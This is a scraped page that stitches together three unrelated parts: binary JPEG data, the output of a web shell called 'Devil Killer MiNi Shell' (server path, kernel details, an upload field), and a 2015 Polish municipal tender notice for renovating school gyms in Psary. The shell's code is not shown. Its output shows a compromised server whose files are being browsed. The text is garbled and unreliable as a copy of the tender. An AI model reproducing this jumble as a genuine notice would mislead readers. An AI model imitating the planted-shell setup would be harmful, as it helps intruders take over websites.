JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20150521/

Linux eb5096292c53 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20150521/119944-N-2015.html

<p class="kh_header"><b>Psary: Roboty budowlane z podziałem na dwa zadania o nazwie:  Zadanie Nr I:
Część 1: Remont sali gimnastycznej przy Zespole Szkolno - Przedszkolnym Nr 2 
w Sarnowie przy ul. Szkolnej 5. Część 2:  Remont  sali gimnastycznej  przy 
Gimnazjum w Psarach przy ul. Szkolnej 32
Zadanie Nr II:  Budowa boiska wielofunkcyjnego i skoczni w dal przy Szkole Podstawowej w Dąbiu</b><br>
<b>Numer ogłoszenia: 119944 - 2015; data zamieszczenia: 21.05.2015</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Urząd Gminy w Psarach , ul. Malinowicka 4, 42-512 Psary, woj. śląskie, tel. 32 294 49 00 wew. 41, faks 32 294 49 01.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.psary.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Roboty budowlane z podziałem na dwa zadania o nazwie:  Zadanie Nr I:
Część 1: Remont sali gimnastycznej przy Zespole Szkolno - Przedszkolnym Nr 2 
w Sarnowie przy ul. Szkolnej 5. Część 2:  Remont  sali gimnastycznej  przy 
Gimnazjum w Psarach przy ul. Szkolnej 32
Zadanie Nr II:  Budowa boiska wielofunkcyjnego i skoczni w dal przy Szkole Podstawowej w Dąbiu.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia są roboty budowlane z podziałem na dwa zadania:  
Zadanie Nr I:
Część 1: Remont sali gimnastycznej przy Zespole Szkolno - Przedszkolnym Nr 2 
w Sarnowie przy ul. Szkolnej 5.
Część 2: Remont  sali gimnastycznej  przy Gimnazjum w Psarach przy ul. Szkolnej 32,  
Zadanie Nr II:  Budowa boiska wielofunkcyjnego i skoczni w dal przy Szkole Podstawowej w Dąbiu. 
Szczegółowy przedmiot zamówienia dla zadania nr I i zadania Nr II określony został w Specyfikacji Istotnych Warunków Zamówienia /zał Nr 8 i 8a/, w projektach budowlanych wraz z uzgodnieniami, warunkami, opiniami oraz w specyfikacjach technicznych wykonania i odbioru robót a także w Decyzjach Starosty Będzińskiego o pozwoleniu na budowę.</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 45.43.21.20-1, 45.43.00.00-0, 45.45.30.00-7, 45.33.12.10-1, 45.31.00.00-3, 45.21.22.00-8, 45.23.21.30-2, 45.31.61.00-6, 45.31.53.00-1.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 2.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> 1. Oferta musi być zabezpieczona wadium w wysokości: - Zadanie Nr I: 10 000,00 zł (dziesięć tysięcy złotych), - Zadanie Nr II: 20 000,00 zł (dwadzieścia tysięcy złotych) 2. Wadium może być wniesione w jednej lub kilku następujących formach: pieniądzu,poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo-kredytowej z tym że poręczenie kasy jest zawsze poręczeniem pieniężnym,gwarancjach bankowych, gwarancjach ubezpieczeniowych, poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt 2 ustawy z dnia 9 listopada 2000r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (Dz.U. Z 2007 r. Nr 42, poz. 275 z późn. zm.). 3. Wadium wnoszone w pieniądzu należy wpłacać przelewem na następujący nr konta: Bank Spółdzielczy w Będzinie Oddział Psary nr:44843800010000025720160003, Uwaga: Wadium w tej formie uważa się za wniesione w sposób prawidłowy, gdy środki pieniężne wpłyną na konto Zamawiającego przed upływem terminu składania ofert. 3.1. Wadium wnoszone w postaci niepieniężnej (w innych dopuszczalnych formach wymienionych w pkt 2), należy złożyć w oryginale w siedzibie Zamawiającego kancelaria ogólna - parter budynku, za potwierdzeniem odbioru w terminie nie późniejszym niż termin składania ofert. 4. Do oferty należy dołączyć potwierdzenie wniesienia wadium to jest: a) polecenie przelewu - jeżeli wadium wniesiono w formie pieniężnej, b) kserokopię dokumentu poświadczoną za zgodność z oryginałem przez Wykonawcę jeżeli wadium wniesiono w formie niepieniężnej</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie stawia szczegółowego warunku w tym zakresie. Zamawiający żąda złożenia oświadczenia z art. 22 ust. 1 ustawy i jego weryfikacja zostanie przeprowadzona wg formuły: spełnia- nie spełnia</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca musi wykazać, iż w okresie ostatnich pięciu lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wykonał należycie, zgodnie ze sztuką budowlaną oraz prawidłowo ukończył: dla Zadania Nr I: co najmniej 1 robotę budowlaną polegającą na: wykonaniu lub remoncie nawierzchni sportowej wewnętrznej w obiekcie sportowym na powierzchni minimum 200 m2. Dla Zadania Nr II:  co najmniej 1 robotę budowlaną polegającą na: budowie lub przebudowie lub rozbudowie lub modernizacji boiska wielofunkcyjnego o nawierzchni z sztucznej trawy syntetycznej o powierzchni minimum 500 m2. W celu wykazania spełniania przez Wykonawcę warunku, o którym mowa powyżej, Wykonawca zobowiązany jest przedłożyć wraz z ofertą: a) wykaz wykonanych robót budowlanych w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich pięciu lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie - z podaniem ich rodzaju i wartości, daty i miejsca wykonania - zgodnie z Załącznikiem Nr 4 do SIWZ, oraz załączeniem dowodów dotyczących najważniejszych robót, określających, czy roboty te zostały wykonane w sposób należyty oraz wskazujących, czy zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone. Dowodami na potwierdzenie, że roboty budowlane zostały wykonane należycie są: poświadczenia, inne dokumenty jeżeli z uzasadnionych przyczyn o obiektywnym charakterze wykonawca nie jest w stanie uzyskać poświadczenia o którym wyżej mowa. Należy wykazać i przedłożyć dowody wykonania robót budowlanych w liczbie i zakresie wystarczającym do wykazania spełniania opisanych wyżej warunków. W przypadku gdy Zamawiający Gmina Psary jest podmiotem, na rzecz którego, roboty budowlane wskazane w wykazie, o którym mowa wyżej zostały wcześniej wykonane, Wykonawca nie ma obowiązku przedkładania dowodów o których powyżej mowa. Ocena spełniania warunku dokonana zostanie zgodnie z formułą spełnia-nie spełnia na podstawie złożonego wykazu robót zgodnie z zał Nr 4 do SIWZ. W przypadku składania oferty na dwa zadania należy wykazać roboty budowlane odpowiadające sumie ilości i wartości /powierzchni/ dla poszczególnych zadań.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie stawia szczegółowego warunku w tym zakresie. Zamawiający żąda złożenia oświadczenia z art. 22 ust. 1 ustawy i jego weryfikacja zostanie przeprowadzona wg formuły: spełnia- nie spełnia</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca musi wykazać dysponowanie (dysponuje lub będzie dysponował) osobą/ami zdolną/ymi do wykonania zamówienia tj.: dla Zadania Nr I:co najmniej po 1 osobie posiadającej/ymi przygotowanie zawodowe do wykonywania samodzielnych funkcji technicznych w budownictwie w zakresie kierowania robotami budowlanymi w specjalności: konstrukcyjno budowlanej (kierownik budowy), instalacyjnej, instalacji elektrycznych (kierownik robót), instalacyjnej, instalacji sanitarnych /wentylacji/ (kierownik robót). Dla Zadania Nr II: co najmniej po 1 osobie posiadającej/ymi przygotowanie zawodowe do wykonywania samodzielnych funkcji technicznych w budownictwie w zakresie kierowania robotami budowlanymi w specjalności: konstrukcyjno budowlanej (kierownik budowy), instalacyjnej, instalacji instalacji sanitarnych (kierownik robót),  lub odpowiadające im ważne uprawnienia, które zostały wydane na podstawie wcześniej obowiązujących przepisów. W celu wykazania spełniania przez Wykonawcę warunku, o którym mowa powyżej, Wykonawca zobowiązany jest przedłożyć wraz z ofertą:
a) Wykaz osób, które będą uczestniczyć w  wykonywaniu zamówienia (wystarczające będzie wykazanie wyłącznie osób, o których mowa powyżej,  wraz z informacjami na temat ich kwalifikacji zawodowych niezbędnych dla wykonywania zamówienia, a także zakresu wykonywanych przez nie  czynności,  oraz informacją o podstawie do dysponowania tymi osobami - zgodnie z  Załącznikiem Nr 5 do SIWZ, 
b)  oświadczenie, że osoba/y, która/e będą uczestniczyć w wykonywaniu zamówienia posiada/ją wymagane uprawnienia zgodnie z  zapisem w Zał. nr 5 do SIWZ.
W przypadku składania oferty na dwa zadania wykonawca może wykazać dysponowanie tymi  samymi osobami w specjalności dla poszczególnych branży.
Ocena spełniania warunku dokonana zostanie zgodnie z formułą spełnia-nie spełnia na podstawie złożonego wykazu osób zgodnie z zał Nr 5 do SIWZ</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie stawia szczegółowego warunku w tym zakresie. Zamawiający żąda złożenia oświadczenia z art. 22 ust. 1 ustawy i jego weryfikacja zostanie przeprowadzona wg formuły: spełnia- nie spełnia</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz robót budowlanych wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz z załączeniem dowodów dotyczących najważniejszych robót, określających, czy roboty te zostały wykonane w sposób należyty oraz wskazujących, czy zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone;</li>

<li  style="margin-bottom: 12px;">określenie robót budowlanych, których dotyczy obowiązek wskazania przez wykonawcę w wykazie lub złożenia poświadczeń, w tym informacja o robotach budowlanych niewykonanych lub wykonanych nienależycie<br>Należy wykazać i przedłożyć dowody wykonania robót budowlanych w liczbie i przedmiocie wystarczającym do wykazania spełniania opisanego wyżej warunku w sekcji III.3.2. Dowodami, o których wyżej mowa są: - poświadczenia; - inne dokumenty - jeżeli z uzasadnionych przyczyn o obiektywnym charakterze wykonawca nie jest w stanie uzyskać poświadczenia o którym wyżej mowa. Uwaga: W przypadku gdy zamawiający jest podmiotem, na rzecz którego, roboty budowlane wskazane w wykazie, o którym wyżej mowa, zostały wcześniej wykonane, wykonawca nie ma obowiązku przekładania dowodów o których powyżej mowa;</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków, lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenia zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na zasoby innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1. Oświadczenie, że Wykonawca zapoznał się z warunkami zamówienia i z załączonym projektem umowy oraz, że przyjmuje ich treść bez żadnych zastrzeżeń-na formularzu oferty - zgodnie z załącznikiem nr 1,1a do SIWZ 2. W zakresie warunków udziału w postępowaniu opisanych w pkt 2.2 do 2.4. (opis sposobu dokonywania oceny spełniania warunków) rozdziału V SIWZ, Wykonawca może polegać na wiedzy i doświadczeniu, potencjale technicznym, osobach zdolnych do wykonania zamówienia lub zdolnościach finansowych lub ekonomicznych innych podmiotów, niezależnie od charakteru prawnego łączących go z nimi stosunków. Wykonawca w takiej sytuacji zobowiązany jest udowodnić Zamawiającemu, iż będzie dysponował zasobami niezbędnymi do realizacji zamówienia, w szczególności przedstawiając w tym celu pisemne zobowiązanie tych podmiotów do oddania mu do dyspozycji niezbędnych zasobów na potrzeby wykonania zamówienia. Zobowiązanie takie należy złożyć w oryginale lub kopii poświadczonej za zgodność przez notariusza lub kopii poświadczonej za zgodność z oryginałem przez podmiot udostępniający swoje zasoby. Jeżeli Wykonawca wykazując spełnianie warunków, o których mowa w art. 22 ust. 1 ustawy, polega na zasobach innych podmiotów na zasadach określonych w art. 26 ust. 2b ustawy, Zamawiający w celu oceny, czy wykonawca będzie dysponował zasobami innych podmiotów w stopniu niezbędnym dla należytego wykonania zamówienia oraz oceny , czy stosunek łączący wykonawce z tymi podmiotami gwarantuje rzeczywisty dostęp do ich zasobów, może żądać dokumentów w szczególności: a) zakresu dostępnych Wykonawcy zasobów innego podmiotu, b) sposobu wykorzystania zasobów innego podmiotu, przez wykonawcę, przy wykonywaniu zamówienia, c) charakteru stosunku, jaki będzie łączył wykonawcę z innym podmiotem, d) zakresu i okresu udziału innego podmiotu przy wykonywaniu zamówienia. 3. Pełnomocnictwo ustanowione do reprezentowania Wykonawcy-ów ubiegającego-cych się o udzielenie zamówienia publicznego. Pełnomocnictwo należy składać w oryginale bądź kopii, potwierdzonej za zgodność z oryginałem notarialnie</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p><ul class="kh_indent_1">
<li>1 - Cena - 95</li>
<li>2 - okres udzielonej gwarancji na przedmiot umowy - 5</li>
</ul>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający przewiduje możliwość zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru Wykonawcy, zgodnie z warunkami podanymi w projekcie umowy /w zależności od nr zadania/ od stanowiącym załączniki Nr 7, 7a do SIWZ</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.bip.psary.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Gminy w Psarach ul. Malinowicka 4, 42-512 Psary, II piętro pokój 211.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 08.06.2015 godzina 10:00, miejsce: Urząd Gminy w Psarach ul. Malinowicka 4, 42-512 Psary, kancelaria ogólna - parter budynku.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> 1. Informacje dodatkowe: dotyczy sekcji III.3.4 i III.4.1) Osoby zdolne do wykonania zamówienia/wykaz osób: Z uwagi na opis sposobu oceny spełniania warunków zamawiający nie wymaga podania wykształcenia i doświadczenia osób. 2. Potwierdzenie spełniania warunków udziału w niniejszym postępowaniu, Zamawiający oceniał będzie na podstawie wymaganych oświadczeń i dokumentów. 3. Ocena spełniania warunków dokonywana będzie w systemie 0 - 1 (zero - jedynkowym tj. spełnia - nie spełnia), nie spełnienie chociażby jednego z postawionych warunków udziału spowoduje wykluczenie Wykonawcy z postępowania.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Roboty budowlane z podziałem na dwa zadania o nazwie:
Zadanie Nr  I składające się z części 1 i 2:    
Część 1: Remont sali gimnastycznej przy Zespole Szkolno - Przedszkolnym Nr 2 w Sarnowie przy ul. Szkolnej 5,
Część 2:  Remont  sali gimnastycznej  przy Gimnazjum w Psarach przy ul. Szkolnej 32.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Część 1: Remont  sali gimnastycznej przy Zespole Szkolno - Przedszkolnym Nr 2 w Sarnowie przy ul. Szkolnej 5,
1.	W ramach realizacji zadania należy wykonać  w szczególności:
a) prace demontażowe listew przypodłogowych, istniejącego osprzętu sportowego (drabinki, bramki), wywietrzaków dachowych wraz z istniejącym wentylatorem oraz opraw świetlówkowych wraz  z istniejącą instalacją zasilającą,
b) dostosować drzwi wejściowe do nowego poziomu posadzki sportowej,
c) nową systemową, elastyczną podłogę sportową na istniejącym podłożu z wierzchnią warstwą wykładziny z komponentów naturalnych(linoleum) w kolorach zgodnie z projektem oraz liniami założonych dyscyplin oraz listwami przyściennymi,
d) wymianę bramek do piłki ręcznej,
e) nową wentylację i oświetlenie sali wraz z zasilaniem oraz sterowaniem zgodnie z aktualnymi wymogami,
f) uszczelnienie dachu po zdemontowanych wywietrzakach i wentylatorze,
g) ponowny montaż drabinek gimnastycznych wraz z dostawą i montażem materaców na wewnętrznych ścianach szczytowych,
h) dostarczyć wykładzinę ochraniającą posadzkę sportową wraz z urządzeniem do czyszczenia posadzki oraz wózka do transportu tej wykładziny,
i) wykonanie wszelkich robót towarzyszących, wynikających z dokumentacji projektowej oraz specyfikacji technicznej wykonania i odbioru robót.
Część 2:  Remont  sali gimnastycznej przy Gimnazjum w Psarach przy ul. Szkolnej 32,
1.	W ramach realizacji zadania należy wykonać  w szczególności:
a) prace demontażowe listew przypodłogowych, drabinki gimnastyczne, osłony grzejników, zaczepów ściennych do siatkówki, wentylatory na dachu, istniejące oświetlenie wraz z zasilaniem,
b) nową  elastyczną, systemową podłogę sportową na istniejącym podłożu z parkietu z wierzchnią warstwą wykładziny sportowej z komponentów naturalnych(linoleum) w kolorach zgodnie z projektem oraz liniami założonych dyscyplin sportowych i nowymi listwami przyściennymi,
